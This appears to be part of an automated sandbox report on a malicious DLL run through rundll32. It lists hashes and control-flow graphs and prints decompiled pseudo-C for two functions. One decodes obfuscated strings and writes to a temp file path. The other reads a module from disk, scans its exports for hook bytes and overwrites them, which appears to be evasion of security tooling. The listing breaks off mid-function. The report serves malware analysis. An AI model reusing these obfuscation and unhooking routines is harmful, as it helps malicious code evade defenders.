                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Freelstrcpy$AllocH_prolog3$H_prolog3_InitializeInternetOpen
                                                      • String ID: $!$!$$$$$$$$$$$&$&$&$'$'$'$'$*$*$*$*$*$+$/$0$0$0$3$4$8$8$8$8$:$:$:$:$;$<$=$=$=$>$>$>$>$>$>$>$@$A$B$C:\Users\user\ndgfht.frg$D$E$F$F$F$G$G$G$G$G$H$I$I$J$J$L$P$P$P$P$Q$Q$R$S$TDWvU$U$U$W$X$Y$Y$Y$Y$Z$[$[$[$\$\$^$^$_$_$a$a$a$a$a$a$a$a$a$b$b$b$b$c$d$d$d$e$f$g$g$g$h$h$i$j$j$j$j$j$l$l$l$l$m$n$n$n$n$n$n$n$q$q$q$t$t$u$u$u$u$u$u$u$u$u$w$x$x$x$x$x$y$y$z$z$z$z${${$|$|$~$~
                                                      • API String ID: 468384634-3690111862
                                                      • Opcode ID: 136f4a77626199cc2aae5abe8279d51fbf8b334559bef31fe1a4dc4f0bbbf67d
                                                      • Instruction ID: 6f00da504cb7d7850f071629bdc6cce1a62a7266e3329b4579685b949cd6a31e
                                                      • Opcode Fuzzy Hash: 136f4a77626199cc2aae5abe8279d51fbf8b334559bef31fe1a4dc4f0bbbf67d
                                                      • Instruction Fuzzy Hash: F9824520D083D8C9EF22C7B89D597DDBFB55F16308F0844D9C4896B292D7B94A89DF22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E776741, Relevance: 142.0, APIs: 3, Strings: 78, Instructions: 280stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 228 6e776741-6e7767d3 call 6e77111c 231 6e7767d5-6e7767d9 228->231 232 6e77680f-6e776b26 call 6e77657f call 6e77111c call 6e775982 call 6e77657f GetTempFileNameW 228->232 233 6e7767da-6e776800 231->233 244 6e776b59-6e776c53 lstrcpyW 232->244 245 6e776b28 232->245 233->233 235 6e776802-6e776808 233->235 235->232 247 6e776c55-6e776c79 244->247 248 6e776c82-6e776cb7 lstrcpyW call 6e771636 244->248 246 6e776b2a-6e776b50 245->246 246->246 249 6e776b52 246->249 247->247 250 6e776c7b 247->250 252 6e776cbc-6e776cd3 call 6e778727 248->252 249->244 250->248
                                                      C-Code - Quality: 81%
                                                      			E6E776741() {
				signed int _v8;
				short _v60;
				short _v172;
				short _v752;
				char _v768;
				char _v771;
				char _v772;
				char _v773;
				char _v774;
				char _v775;
				char _v776;
				char _v777;
				char _v778;
				char _v779;
				char _v780;
				char _v781;
				char _v782;
				char _v783;
				char _v784;
				WCHAR* _v786;
				char _v787;
				char _v788;
				char _v789;
				char _v790;
				char _v791;
				char _v792;
				char _v793;
				char _v794;
				char _v795;
				char _v796;
				char _v797;
				char _v798;
				char _v799;
				char _v800;
				char _v801;
				char _v802;
				char _v803;
				char _v804;
				char _v805;
				char _v806;
				char _v807;
				char _v808;
				char _v809;
				char _v810;
				char _v811;
				char _v812;
				char _v813;
				char _v814;
				char _v815;
				short _v816;
				WCHAR* _v819;
				char _v820;
				char _v821;
				char _v822;
				char _v823;
				char _v824;
				char _v825;
				char _v826;
				char _v827;
				char _v828;
				char _v829;
				char _v830;
				char _v831;
				char _v832;
				char _v833;
				char _v834;
				char _v835;
				WCHAR* _v836;
				WCHAR* _v838;
				char _v839;
				char _v840;
				char _v841;
				char _v842;
				char _v843;
				char _v844;
				char _v845;
				char _v846;
				char _v847;
				char _v848;
				char _v849;
				char _v850;
				char _v851;
				char _v852;
				char _v853;
				char _v854;
				char _v855;
				char _v856;
				char _v857;
				char _v858;
				char _v859;
				char _v860;
				char _v861;
				char _v862;
				char _v863;
				char _v864;
				char _v865;
				char _v866;
				char _v867;
				char _v868;
				char _v869;
				char _v870;
				char _v871;
				char _v872;
				char _v873;
				char _v874;
				char _v875;
				char _v876;
				char _v877;
				char _v878;
				char _v879;
				char _v880;
				char _v881;
				char _v882;
				char _v883;
				char _v884;
				char _v885;
				char _v886;
				char _v887;
				char _v888;
				char _v889;
				char _v890;
				char _v891;
				char _v892;
				char _v893;
				char _v894;
				char _v895;
				char _v896;
				char _v897;
				char _v898;
				char _v899;
				char _v900;
				char _v901;
				char _v902;
				char _v903;
				char _v904;
				char _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				char _v910;
				char _v911;
				char _v912;
				char _v913;
				char _v914;
				char _v915;
				char _v916;
				char _v917;
				char _v918;
				char _v919;
				short _v920;
				intOrPtr _v924;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t213;
				intOrPtr _t215;
				intOrPtr* _t218;
				void* _t220;
				WCHAR* _t259;
				void* _t268;
				void* _t270;
				signed int _t280;
				signed int _t282;
				void* _t284;
				WCHAR* _t285;
				char _t286;
				signed int _t287;

				_t213 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t213 ^ _t287;
				_t215 = E6E77111C();
				_v784 = 0x3c;
				_t279 = _t215;
				_v783 = 0x49;
				_t259 = 0;
				_v782 = 0x10;
				_v781 = 0x24;
				_v780 = 0x49;
				_v779 = 0x44;
				_v778 = 0x52;
				_v777 = 0x66;
				_v776 = 0xc;
				_v775 = 0x10;
				_v774 = 0x57;
				_v773 = 0x32;
				_v772 = 0x19;
				_v771 = 0;
				_v924 = _t215;
				if(_v771 == 0) {
					_t286 = 0;
					_t282 = 0x7f;
					do {
						_t270 = 0x19;
						asm("cdq");
						asm("cdq");
						 *(_t287 + _t286 - 0x30c) = (_t282 + (_t270 - ( *(_t287 + _t286 - 0x30c) & 0x000000ff)) * 0x1b % _t282) % _t282;
						_t286 = _t286 + 1;
					} while (_t286 < 0xd);
					_t279 = _v924;
					_v771 = 1;
				}
				_t218 = E6E77657F(_t279,  &_v784);
				 *_t218(0x122,  &_v752);
				_t220 = E6E77111C();
				_v836 = _t259;
				_v835 = 0x29;
				_v834 = 0x7d;
				_v833 = 0x16;
				_v832 = 0x29;
				_v831 = 0x23;
				_v830 = 1;
				_v829 = 0x60;
				_v828 = 0x26;
				_v827 = 4;
				_v826 = 0x29;
				_v825 = 0x5a;
				_v824 = 0x2c;
				_v823 = 0x23;
				_v822 = 0x29;
				_v821 = 0x73;
				_v820 = 0x55;
				_v819 = _t259;
				E6E77657F(_t220, E6E775982( &_v836));
				GetTempFileNameW( &_v752, _t259, _t259,  &_v752); // executed
				_v920 = 0x52;
				_v919 = 0xb;
				_v918 = 0x38;
				_v917 = 0xb;
				_v916 = 0x38;
				_v915 = 0xb;
				_v914 = 0x6b;
				_v913 = 0xb;
				_v912 = 0x25;
				_v911 = 0xb;
				_v910 = 0x61;
				_v909 = 0xb;
				_v908 = 0xf;
				_v907 = 0xb;
				_v906 = 0xf;
				_v905 = 0xb;
				_v904 = 0x32;
				_v903 = 0xb;
				_v902 = 0x65;
				_v901 = 0xb;
				_v900 = 0x72;
				_v899 = 0xb;
				_v898 = 0x12;
				_v897 = 0xb;
				_v896 = 0x58;
				_v895 = 0xb;
				_v894 = 0x25;
				_v893 = 0xb;
				_v892 = 0x58;
				_v891 = 0xb;
				_v890 = 0x2c;
				_v889 = 0xb;
				_v888 = 0x38;
				_v887 = 0xb;
				_v886 = 0x7b;
				_v885 = 0xb;
				_v884 = 0x72;
				_v883 = 0xb;
				_v882 = 0x58;
				_v881 = 0xb;
				_v880 = 0x32;
				_v879 = 0xb;
				_v878 = 0xf;
				_v877 = 0xb;
				_v876 = 0x4b;
				_v875 = 0xb;
				_v874 = 0x6b;
				_v873 = 0xb;
				_v872 = 6;
				_v871 = 0xb;
				_v870 = 0x4c;
				_v869 = 0xb;
				_v868 = 0x38;
				_v867 = 0xb;
				_v866 = 0x19;
				_v865 = 0xb;
				_v864 = 0xf;
				_v863 = 0xb;
				_v862 = 0x25;
				_v861 = 0xb;
				_v860 = 0x19;
				_v859 = 0xb;
				_v858 = 0x12;
				_v857 = 0xb;
				_v856 = 0x5e;
				_v855 = 0xb;
				_v854 = 0x65;
				_v853 = 0xb;
				_v852 = 0x72;
				_v851 = 0xb;
				_v850 = 0x19;
				_v849 = 0xb;
				_v848 = 0x7b;
				_v847 = 0xb;
				_v846 = 0x19;
				_v845 = 0xb;
				_v844 = 5;
				_v843 = 0xb;
				_v842 = 0x19;
				_v841 = 0xb;
				_v840 = 0xb;
				_v839 = 0xb;
				_v838 = _t259;
				_t280 = 0x7f;
				if(_v838 == _t259) {
					_t285 = _t259;
					do {
						_t268 = 0xb;
						asm("cdq");
						asm("cdq");
						 *(_t287 + _t285 - 0x394) = (_t280 + (_t268 - ( *(_t287 + _t285 - 0x394) & 0x000000ff)) * 0x14 % _t280) % _t280;
						_t285 =  &(_t285[0]);
					} while (_t285 < 0x52);
					_v838 = 1;
				}
				_t284 = lstrcpyW;
				lstrcpyW( &_v172,  &_v920);
				_v816 = 0x47;
				_v815 = 0x4d;
				_v814 = 0x5d;
				_v813 = 0x4d;
				_v812 = 0x37;
				_v811 = 0x4d;
				_v810 = 0x6d;
				_v809 = 0x4d;
				_v808 = 0x15;
				_v807 = 0x4d;
				_v806 = 0x25;
				_v805 = 0x4d;
				_v804 = 9;
				_v803 = 0x4d;
				_v802 = 0x27;
				_v801 = 0x4d;
				_v800 = 0x25;
				_v799 = 0x4d;
				_v798 = 0x39;
				_v797 = 0x4d;
				_v796 = 0x70;
				_v795 = 0x4d;
				_v794 = 0x5c;
				_v793 = 0x4d;
				_v792 = 0x49;
				_v791 = 0x4d;
				_v790 = 0x25;
				_v789 = 0x4d;
				_v788 = 0x4d;
				_v787 = 0x4d;
				_v786 = _t259;
				if(_v786 == _t259) {
					do {
						asm("cdq");
						asm("cdq");
						 *(_t287 + _t259 - 0x32c) = (_t280 + (( *(_t287 + _t259 - 0x32c) & 0x000000ff) - 0x4d) * 7 % _t280) % _t280;
						_t259 =  &(_t259[0]);
					} while (_t259 < 0x1e);
					_v786 = 1;
				}
				lstrcpyW( &_v60,  &_v816);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E6E771636( &_v172,  &_v752,  &_v60, "C:\Users\Albus\ndgfht.frg",  &_v768); // executed
				asm("sbb eax, eax");
				return E6E778727(_t259, _v8 ^ _t287,  &_v752,  &_v768, _t284);
			}












































































































































































                                                      0x6e77674a
                                                      0x6e776751
                                                      0x6e776757
                                                      0x6e77675c
                                                      0x6e776763
                                                      0x6e776765
                                                      0x6e77676c
                                                      0x6e77676e
                                                      0x6e776775
                                                      0x6e77677c
                                                      0x6e776783
                                                      0x6e77678a
                                                      0x6e776791
                                                      0x6e776798
                                                      0x6e77679f
                                                      0x6e7767a6
                                                      0x6e7767ad
                                                      0x6e7767b4
                                                      0x6e7767c1
                                                      0x6e7767c7
                                                      0x6e7767d3
                                                      0x6e7767d7
                                                      0x6e7767d9
                                                      0x6e7767da
                                                      0x6e7767e6
                                                      0x6e7767ec
                                                      0x6e7767f2
                                                      0x6e7767f5
                                                      0x6e7767fc
                                                      0x6e7767fd
                                                      0x6e776802
                                                      0x6e776808
                                                      0x6e776808
                                                      0x6e776818
                                                      0x6e776829
                                                      0x6e77682b
                                                      0x6e776830
                                                      0x6e77683c
                                                      0x6e776845
                                                      0x6e77684c
                                                      0x6e776853
                                                      0x6e77685a
                                                      0x6e776861
                                                      0x6e776868
                                                      0x6e77686f
                                                      0x6e776876
                                                      0x6e77687d
                                                      0x6e776884
                                                      0x6e77688b
                                                      0x6e776892
                                                      0x6e776899
                                                      0x6e7768a0
                                                      0x6e7768a7
                                                      0x6e7768b4
                                                      0x6e7768c2
                                                      0x6e7768d1
                                                      0x6e7768d3
                                                      0x6e7768da
                                                      0x6e7768e1
                                                      0x6e7768e8
                                                      0x6e7768ef
                                                      0x6e7768f6
                                                      0x6e7768fd
                                                      0x6e776904
                                                      0x6e77690b
                                                      0x6e776912
                                                      0x6e776919
                                                      0x6e776920
                                                      0x6e776927
                                                      0x6e77692e
                                                      0x6e776935
                                                      0x6e77693c
                                                      0x6e776943
                                                      0x6e77694a
                                                      0x6e776951
                                                      0x6e776958
                                                      0x6e77695f
                                                      0x6e776966
                                                      0x6e77696d
                                                      0x6e776974
                                                      0x6e77697b
                                                      0x6e776982
                                                      0x6e776989
                                                      0x6e776990
                                                      0x6e776997
                                                      0x6e77699e
                                                      0x6e7769a5
                                                      0x6e7769ac
                                                      0x6e7769b3
                                                      0x6e7769ba
                                                      0x6e7769c1
                                                      0x6e7769c8
                                                      0x6e7769cf
                                                      0x6e7769d6
                                                      0x6e7769dd
                                                      0x6e7769e4
                                                      0x6e7769eb
                                                      0x6e7769f2
                                                      0x6e7769f9
                                                      0x6e776a00
                                                      0x6e776a07
                                                      0x6e776a0e
                                                      0x6e776a15
                                                      0x6e776a1c
                                                      0x6e776a23
                                                      0x6e776a2a
                                                      0x6e776a31
                                                      0x6e776a38
                                                      0x6e776a3f
                                                      0x6e776a46
                                                      0x6e776a4d
                                                      0x6e776a54
                                                      0x6e776a5b
                                                      0x6e776a62
                                                      0x6e776a69
                                                      0x6e776a70
                                                      0x6e776a77
                                                      0x6e776a7e
                                                      0x6e776a85
                                                      0x6e776a8c
                                                      0x6e776a93
                                                      0x6e776a9a
                                                      0x6e776aa1
                                                      0x6e776aa8
                                                      0x6e776aaf
                                                      0x6e776ab6
                                                      0x6e776abd
                                                      0x6e776ac4
                                                      0x6e776acb
                                                      0x6e776ad2
                                                      0x6e776ad9
                                                      0x6e776ae0
                                                      0x6e776ae7
                                                      0x6e776aee
                                                      0x6e776af5
                                                      0x6e776afc
                                                      0x6e776b03
                                                      0x6e776b0a
                                                      0x6e776b17
                                                      0x6e776b1f
                                                      0x6e776b26
                                                      0x6e776b28
                                                      0x6e776b2a
                                                      0x6e776b36
                                                      0x6e776b3c
                                                      0x6e776b42
                                                      0x6e776b45
                                                      0x6e776b4c
                                                      0x6e776b4d
                                                      0x6e776b52
                                                      0x6e776b52
                                                      0x6e776b59
                                                      0x6e776b6d
                                                      0x6e776b6f
                                                      0x6e776b76
                                                      0x6e776b7d
                                                      0x6e776b84
                                                      0x6e776b8b
                                                      0x6e776b92
                                                      0x6e776b99
                                                      0x6e776ba0
                                                      0x6e776ba7
                                                      0x6e776bae
                                                      0x6e776bb5
                                                      0x6e776bbc
                                                      0x6e776bc3
                                                      0x6e776bca
                                                      0x6e776bd1
                                                      0x6e776bd8
                                                      0x6e776bdf
                                                      0x6e776be6
                                                      0x6e776bed
                                                      0x6e776bf4
                                                      0x6e776bfb
                                                      0x6e776c02
                                                      0x6e776c09
                                                      0x6e776c10
                                                      0x6e776c17
                                                      0x6e776c1e
                                                      0x6e776c25
                                                      0x6e776c2c
                                                      0x6e776c33
                                                      0x6e776c3a
                                                      0x6e776c47
                                                      0x6e776c53
                                                      0x6e776c55
                                                      0x6e776c65
                                                      0x6e776c6b
                                                      0x6e776c6e
                                                      0x6e776c75
                                                      0x6e776c76
                                                      0x6e776c7b
                                                      0x6e776c7b
                                                      0x6e776c8d
                                                      0x6e776c97
                                                      0x6e776ca4
                                                      0x6e776ca5
                                                      0x6e776ca6
                                                      0x6e776cb7
                                                      0x6e776cc4
                                                      0x6e776cd3

                                                      APIs
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?,00000000), ref: 6E7768D1
                                                      • lstrcpyW.KERNEL32(?,00000052), ref: 6E776B6D
                                                      • lstrcpyW.KERNEL32(?,00000047), ref: 6E776C8D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: lstrcpy$FileH_prolog3NameTemp
                                                      • String ID: #$#$$$%$%$%$%$%$%$&$'$)$)$)$)$,$,$2$2$2$7$8$8$8$8$9$<$C:\Users\user\ndgfht.frg$D$G$I$I$I$K$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$R$R$U$W$X$X$X$Z$\$]$^$`$a$e$e$f$k$k$m$p$r$r$r$s${${$}
                                                      • API String ID: 623631418-3535340559
                                                      • Opcode ID: ace95b5500ba80bb63ea9b3762b0f9bbc4378b244cf8792c8bd273b24784de15
                                                      • Instruction ID: f7c134c373138e060278753f9fb8a1924660d93c2e1b32fb629b75d13d353745
                                                      • Opcode Fuzzy Hash: ace95b5500ba80bb63ea9b3762b0f9bbc4378b244cf8792c8bd273b24784de15
                                                      • Instruction Fuzzy Hash: 5AF1BF5080C6ECDEEB3386689C587D9BFBC1B26304F4840D9D09D6B142C7BA5B89DF25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E775EA9, Relevance: 121.1, APIs: 15, Strings: 54, Instructions: 384memorylibraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 255 6e775ea9-6e775f61 256 6e775f94-6e776073 call 6e775d40 GetProcAddress call 6e775d40 call 6e7759b6 call 6e775d40 GetProcAddress call 6e775d40 CreateFileA 255->256 257 6e775f63 255->257 271 6e776501-6e77650f call 6e778727 256->271 272 6e776079-6e7761ad call 6e772eef call 6e775d40 GetProcAddress call 6e775d40 call 6e771bc1 call 6e775d40 GetProcAddress call 6e775d40 256->272 259 6e775f65-6e775f8b 257->259 259->259 260 6e775f8d 259->260 260->256 288 6e7761b3-6e7761cc GetProcessHeap RtlAllocateHeap 272->288 289 6e7764fe 272->289 288->289 290 6e7761d2-6e776225 288->290 289->271 291 6e776227-6e77622b 290->291 292 6e776259-6e776295 call 6e775d40 GetProcAddress call 6e775d40 ReadFile 290->292 293 6e77622c-6e776250 291->293 299 6e776297-6e7762ad GetProcessHeap HeapFree 292->299 300 6e7762b2-6e7762f9 CloseHandle call 6e775dbe * 3 292->300 293->293 295 6e776252 293->295 295->292 299->271 308 6e7764de-6e7764e6 300->308 309 6e7762fe-6e776342 call 6e775dbe * 3 308->309 310 6e7764ec-6e7764fc GetProcessHeap HeapFree 308->310 317 6e7764c6-6e7764db 309->317 318 6e776348-6e77634e 309->318 310->271 317->308 318->317 319 6e776354-6e77635a 318->319 320 6e776361-6e776364 319->320 321 6e77635c-6e77635f 319->321 323 6e776366-6e776369 320->323 324 6e77636b-6e776370 320->324 321->320 322 6e776381-6e776386 321->322 322->318 325 6e776388 322->325 323->322 323->324 324->322 326 6e776372-6e776375 324->326 325->317 326->322 327 6e776377-6e77637a 326->327 327->322 328 6e77637c-6e77637f 327->328 328->322 329 6e77638d-6e7763a8 call 6e775e1e 328->329 329->317 332 6e7763ae-6e7763b2 329->332 333 6e7763c6-6e7763d1 332->333 334 6e7763b4-6e7763b6 332->334 333->317 336 6e7763d7-6e776491 call 6e771074 call 6e775d40 GetProcAddress call 6e775d40 333->336 334->317 335 6e7763bc-6e7763c0 334->335 335->317 335->333 336->310 344 6e776493-6e7764be 336->344 344->310 346 6e7764c0 344->346 346->317
                                                      C-Code - Quality: 75%
                                                      			E6E775EA9(intOrPtr __ecx) {
				signed int _v8;
				char _v272;
				signed int _v276;
				long _v280;
				signed int _v284;
				long _v292;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				void* _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				void* _v332;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				void* _v400;
				intOrPtr _v404;
				void* _v408;
				signed int* _v412;
				intOrPtr _v416;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				_Unknown_base(*)()* _t197;
				CHAR* _t200;
				void* _t207;
				CHAR* _t210;
				void* _t212;
				CHAR* _t215;
				void* _t223;
				long _t230;
				void* _t232;
				void* _t233;
				intOrPtr _t236;
				void* _t243;
				intOrPtr _t246;
				CHAR* _t250;
				signed int _t269;
				signed int _t275;
				signed int _t277;
				intOrPtr _t294;
				intOrPtr* _t296;
				signed int* _t298;
				void* _t300;
				void* _t301;
				void* _t311;
				struct HINSTANCE__* _t312;
				struct HINSTANCE__* _t313;
				struct HINSTANCE__* _t315;
				struct HINSTANCE__* _t316;
				struct HINSTANCE__* _t321;
				signed int* _t322;
				signed int _t325;
				struct _SECURITY_ATTRIBUTES* _t326;
				signed int _t327;

				_t192 =  *0x6e78c00c; // 0x9bbef7a8
				_v8 = _t192 ^ _t327;
				_v404 = __ecx;
				_v328 = 0x57;
				_v327 = 0x16;
				_v326 = 0x35;
				_v325 = 0x4a;
				_v324 = 0x55;
				_v323 = 3;
				_v322 = 0x48;
				_v321 = 0x1c;
				_v320 = 0x16;
				_v319 = 0x44;
				_v318 = 0x62;
				_v317 = 0x1c;
				_v316 = 0x16;
				_v315 = 0x5d;
				_v314 = 0x49;
				_v313 = 0x2f;
				_v312 = 0x16;
				_v311 = 0x64;
				_v310 = 8;
				_v309 = 0;
				_t277 = 0x7f;
				if(_v309 == 0) {
					_t326 = 0;
					do {
						_t301 = 8;
						asm("cdq");
						_t275 = _t277 + (_t301 - ( *(_t327 + _t326 - 0x144) & 0x000000ff)) * 0x14 % _t277;
						asm("cdq");
						_t303 = _t275 % _t277;
						 *(_t327 + _t326 - 0x144) = _t275 % _t277;
						_t326 =  &(_t326->nLength);
					} while (_t326 < 0x13);
					_v309 = 1;
				}
				_t316 =  *0x6e78d3cc; // 0x766e0000
				E6E775D40();
				_t197 = GetProcAddress(_t316,  &_v328);
				E6E775D40();
				_v348 = 4;
				_v347 = 0x5f;
				_v346 = 0x20;
				_v345 = 0x51;
				_v344 = 7;
				_v343 = 0x20;
				_v342 = 0x7e;
				_v341 = 0x6e;
				_v340 = 0x69;
				_v339 = 0x20;
				_v338 = 0x5c;
				_v337 = 0x1f;
				_v336 = 0;
				_t200 = E6E7759B6( &_v348);
				_t311 =  *0x6e78d3cc; // 0x766e0000
				E6E775D40();
				_t318 = GetProcAddress(_t311, _t200);
				E6E775D40();
				 *_t197(_v404,  &_v272, 0x104);
				_t279 = 0;
				_t207 = CreateFileA( &_v272, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v332 = _t207;
				if(_t207 != 0) {
					_v380 = 9;
					_v379 = 0xc;
					_v378 = 0x4d;
					_v377 = 0x2f;
					_v376 = 0x72;
					_v375 = 0;
					_v374 = 0xc;
					_v373 = 0x3d;
					_v372 = 0x72;
					_v371 = 0x67;
					_v370 = 0xc;
					_v369 = 0x55;
					_v368 = 0x34;
					_v367 = 0x28;
					_v366 = 0;
					_t210 = E6E772EEF( &_v380);
					_t312 =  *0x6e78d3cc; // 0x766e0000
					E6E775D40();
					_t212 = GetProcAddress(_t312, _t210);
					_t279 = _t212;
					E6E775D40();
					_v364 = 0xe;
					_v363 = 0x26;
					_v362 = 0x6f;
					_v361 = 0x27;
					_v360 = 0x25;
					_v359 = 0x33;
					_v358 = 0x6d;
					_v357 = 2;
					_v356 = 0x37;
					_v355 = 0x26;
					_v354 = 0x25;
					_v353 = 0x4d;
					_v352 = 0;
					_t215 = E6E771BC1( &_v364);
					_t313 =  *0x6e78d3cc; // 0x766e0000
					E6E775D40();
					_t318 = GetProcAddress(_t313, _t215);
					_v308 = _t318;
					E6E775D40();
					_t311 = _v332;
					_push( &_v292);
					_push(_t311);
					if( *_t212() == 0) {
						L37:
						 *_t318(_t311);
					} else {
						_t223 = RtlAllocateHeap(GetProcessHeap(), 0, _v292); // executed
						_t279 = _t223;
						if(_t279 == 0) {
							goto L37;
						} else {
							_v304 = 0x26;
							_v303 = 0x75;
							_v302 = 0x57;
							_v301 = 0x2e;
							_v300 = 0x4b;
							_v299 = 0x14;
							_v298 = 0x6a;
							_v297 = 0x75;
							_v296 = 0x3a;
							_v295 = 0;
							if(_v295 == 0) {
								_t300 = 0;
								_t325 = 0x7f;
								do {
									asm("cdq");
									_t269 = _t325 + (( *(_t327 + _t300 - 0x12c) & 0x000000ff) - 0x3a) * 0x22 % _t325;
									asm("cdq");
									_t303 = _t269 % _t325;
									 *(_t327 + _t300 - 0x12c) = _t269 % _t325;
									_t300 = _t300 + 1;
								} while (_t300 < 9);
								_v295 = 1;
							}
							_t321 =  *0x6e78d3cc; // 0x766e0000
							E6E775D40();
							_t318 = GetProcAddress(_t321,  &_v304);
							E6E775D40();
							_v280 = _v280 & 0x00000000;
							_t230 = ReadFile(_t311, _t279, _v292,  &_v280, 0); // executed
							if(_t230 != 0) {
								CloseHandle(_t311);
								_t232 = E6E775DBE( *((intOrPtr*)( *((intOrPtr*)(_t279 + 0x3c)) + _t279 + 0x78)), _t279);
								_t314 = _t279 + _t232;
								_v308 = _t279 + _t232;
								_t233 = E6E775DBE( *((intOrPtr*)(_t279 + _t232 + 0x20)), _t279);
								_t303 = _t279;
								_t318 = _t279 + _t233;
								_v408 = _t279 + _t233;
								_t311 = _t279 + E6E775DBE( *((intOrPtr*)(_t314 + 0x24)), _t279);
								_t236 =  *((intOrPtr*)(_v308 + 0x18));
								while(1) {
									_v332 = _t311;
									if(_t236 == 0) {
										break;
									}
									_v416 = _t236 - 1;
									_v400 = E6E775DBE( *_t318, _t279) + _t279;
									_t243 = E6E775DBE( *((intOrPtr*)(E6E775DBE( *((intOrPtr*)(_v308 + 0x1c)), _t279) + _t279 + ( *_t311 & 0x0000ffff) * 4)), _t279);
									_t303 = 0;
									_t322 = _t243 + _t279;
									_v412 = _t322;
									if( *_t322 == 0) {
										L34:
										_t236 = _v416;
										_t318 = _v408 + 4;
										_v408 = _v408 + 4;
										_t311 = _t311 + 2;
										continue;
									} else {
										while(_t303 < 0x80) {
											_t294 =  *((intOrPtr*)(_t303 + _t322));
											if(_t294 < 0x61 || _t294 > 0x7a) {
												if(_t294 < 0x41 || _t294 > 0x5a) {
													if(_t294 - 0x30 <= 9 || _t294 == 0x2e || _t294 == 0x5f || _t294 == 0x2d) {
														goto L24;
													} else {
														_t303 = _v400;
														_t296 = E6E775E1E(_v404, _v400);
														_v400 = _t296;
														if(_t296 == 0) {
															goto L34;
														} else {
															_t246 =  *_t296;
															if(_t246 == 0xe9 || _t246 == 0xff &&  *((char*)(_t296 + 1)) == 0x25) {
																if(( *_t322 & 0xffffff00 |  *_t322 !=  *_t296) == 0) {
																	goto L34;
																} else {
																	_v396 = 3;
																	_v395 = 7;
																	_v394 = 0x31;
																	_v393 = 0x10;
																	_v392 = 0x3f;
																	_v391 = 0xc;
																	_v390 = 0x15;
																	_v389 = 0x66;
																	_v388 = 0x31;
																	_v387 = 0x23;
																	_v386 = 0x10;
																	_v385 = 0x49;
																	_v384 = 0x6a;
																	_v383 = 0x10;
																	_v382 = 0x19;
																	_v381 = 0;
																	_t250 = E6E771074( &_v396);
																	_t315 =  *0x6e78d3cc; // 0x766e0000
																	E6E775D40();
																	_t311 = GetProcAddress(_t315, _t250);
																	E6E775D40();
																	_t318 = _v400;
																	_v276 = _v276 & 0x00000000;
																	_push( &_v276);
																	_push(0x40);
																	_push(0x40);
																	_push(_t318);
																	if( *_t311() != 0) {
																		_t298 = _v412;
																		 *_t318 =  *_t298;
																		_push( &_v284);
																		 *(_t318 + 4) = _t298[1];
																		_push(_v276);
																		_v284 = _v284 & 0x00000000;
																		_push(0x40);
																		_push(_t318);
																		if( *_t311() != 0) {
																			_t311 = _v332;
																			goto L34;
																		}
																	}
																}
															} else {
																goto L34;
															}
														}
													}
												} else {
													goto L24;
												}
											} else {
												L24:
												_t303 = _t303 + 1;
												if( *((char*)(_t303 + _t322)) != 0) {
													continue;
												} else {
													goto L34;
												}
											}
											goto L36;
										}
										goto L34;
									}
									break;
								}
								L36:
								HeapFree(GetProcessHeap(), 0, _t279); // executed
							} else {
								HeapFree(GetProcessHeap(), _t230, _t279);
